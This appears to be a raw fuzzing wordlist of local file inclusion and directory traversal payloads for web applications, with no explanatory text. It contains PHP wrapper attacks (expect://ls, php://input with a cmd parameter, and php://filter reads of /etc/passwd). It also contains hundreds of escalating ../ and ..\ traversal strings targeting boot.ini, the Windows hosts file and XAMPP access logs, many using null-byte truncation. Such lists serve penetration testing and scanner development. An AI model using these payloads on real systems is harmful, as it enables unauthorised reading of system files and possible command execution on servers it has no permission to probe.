expect://ls
php://input&cmd=ls
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/resource=/etc/passwd
/C:\boot.ini
../C:\boot.ini
../../C:\boot.ini
../../../C:\boot.ini
../../../../C:\boot.ini
../../../../../C:\boot.ini
../../../../../../C:\boot.ini
../../../../../../../C:\boot.ini
../../../../../../../../C:\boot.ini
../../../../../../../../../C:\boot.ini
../../../../../../../../../../C:\boot.ini
../../../../../../../../../../../C:\boot.ini
/\boot.ini
../\boot.ini
../../\boot.ini
../../../\boot.ini
../../../../\boot.ini
../../../../../\boot.ini
../../../../../../\boot.ini
../../../../../../../\boot.ini
../../../../../../../../\boot.ini
../../../../../../../../../\boot.ini
../../../../../../../../../../\boot.ini
../../../../../../../../../../../\boot.ini
\boot.ini
..\boot.ini
..\..\boot.ini
..\..\..\boot.ini
..\..\..\..\boot.ini
..\..\..\..\..\boot.ini
..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\..\boot.ini
/boot.ini
../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini
../../../../../../../../../boot.ini
../../../../../../../../../../boot.ini
../../../../../../../../../../../boot.ini
/C:\boot.ini%00
../C:\boot.ini%00
../../C:\boot.ini%00
../../../C:\boot.ini%00
../../../../C:\boot.ini%00
../../../../../C:\boot.ini%00
../../../../../../C:\boot.ini%00
../../../../../../../C:\boot.ini%00
../../../../../../../../C:\boot.ini%00
../../../../../../../../../C:\boot.ini%00
../../../../../../../../../../C:\boot.ini%00
../../../../../../../../../../../C:\boot.ini%00
/\boot.ini%00
../\boot.ini%00
../../\boot.ini%00
../../../\boot.ini%00
../../../../\boot.ini%00
../../../../../\boot.ini%00
../../../../../../\boot.ini%00
../../../../../../../\boot.ini%00
../../../../../../../../\boot.ini%00
../../../../../../../../../\boot.ini%00
../../../../../../../../../../\boot.ini%00
../../../../../../../../../../../\boot.ini%00
\boot.ini%00
..\boot.ini%00
..\..\boot.ini%00
..\..\..\boot.ini%00
..\..\..\..\boot.ini%00
..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
/boot.ini%00
../boot.ini%00
../../boot.ini%00
../../../boot.ini%00
../../../../boot.ini%00
../../../../../boot.ini%00
../../../../../../boot.ini%00
../../../../../../../boot.ini%00
../../../../../../../../boot.ini%00
../../../../../../../../../boot.ini%00
../../../../../../../../../../boot.ini%00
../../../../../../../../../../../boot.ini%00
/C:\boot.ini%00.
../C:\boot.ini%00.
../../C:\boot.ini%00.
../../../C:\boot.ini%00.
../../../../C:\boot.ini%00.
../../../../../C:\boot.ini%00.
../../../../../../C:\boot.ini%00.
../../../../../../../C:\boot.ini%00.
../../../../../../../../C:\boot.ini%00.
../../../../../../../../../C:\boot.ini%00.
../../../../../../../../../../C:\boot.ini%00.
../../../../../../../../../../../C:\boot.ini%00.
/\boot.ini%00.
../\boot.ini%00.
../../\boot.ini%00.
../../../\boot.ini%00.
../../../../\boot.ini%00.
../../../../../\boot.ini%00.
../../../../../../\boot.ini%00.
../../../../../../../\boot.ini%00.
../../../../../../../../\boot.ini%00.
../../../../../../../../../\boot.ini%00.
../../../../../../../../../../\boot.ini%00.
../../../../../../../../../../../\boot.ini%00.
\boot.ini%00.
..\boot.ini%00.
..\..\boot.ini%00.
..\..\..\boot.ini%00.
..\..\..\..\boot.ini%00.
..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\..\..\boot.ini%00.
/boot.ini%00.
../boot.ini%00.
../../boot.ini%00.
../../../boot.ini%00.
../../../../boot.ini%00.
../../../../../boot.ini%00.
../../../../../../boot.ini%00.
../../../../../../../boot.ini%00.
../../../../../../../../boot.ini%00.
../../../../../../../../../boot.ini%00.
../../../../../../../../../../boot.ini%00.
../../../../../../../../../../../boot.ini%00.
/windows/system32/drivers/etc/hosts%00
../windows/system32/drivers/etc/hosts%00
../../windows/system32/drivers/etc/hosts%00
../../../windows/system32/drivers/etc/hosts%00
../../../../windows/system32/drivers/etc/hosts%00
../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../../../../windows/system32/drivers/etc/hosts%00
/xampp/apache/logs/access.log%00
../xampp/apache/logs/access.log%00
../../xampp/apache/logs/access.log%00
../../../xampp/apache/logs/access.log%00
../../../../xampp/apache/logs/access.log%00
../../../../../xampp/apache/logs/access.log%00
../../../../../../xampp/apache/logs/access.log%00
../../../../../../../xampp/apache/logs/access.log%00
../../../../../../../../xampp/apache/logs/access.log%00
../../../../../../../../../xampp/apache/logs/access.log%00
../../../../../../../../../../xampp/apache/logs/access.log%00
../../../../../../../../../../../xampp/apache/logs/access.log%00
\windows/system32/drivers/etc/hosts%00
..\windows/system32/drivers/etc/hosts%00
..\..\windows/system32/drivers/etc/hosts%00
..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
/xampp/apache/logs/access.log%00
..\xampp/apache/logs/access.log%00
..\..\xampp/apache/logs/access.log%00
..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\..\..\xampp/apache/logs/access.log%00
\/windows/system32/drivers/etc/hosts%00
..\/windows/system32/drivers/etc/hosts%00
..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
\/xampp/apache/logs/access.log%00
..\/xampp/apache/logs/access.log%00
..\..\/xampp/apache/logs/access.log%00
..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\..\..\/xampp/apache/logs/access.log%00
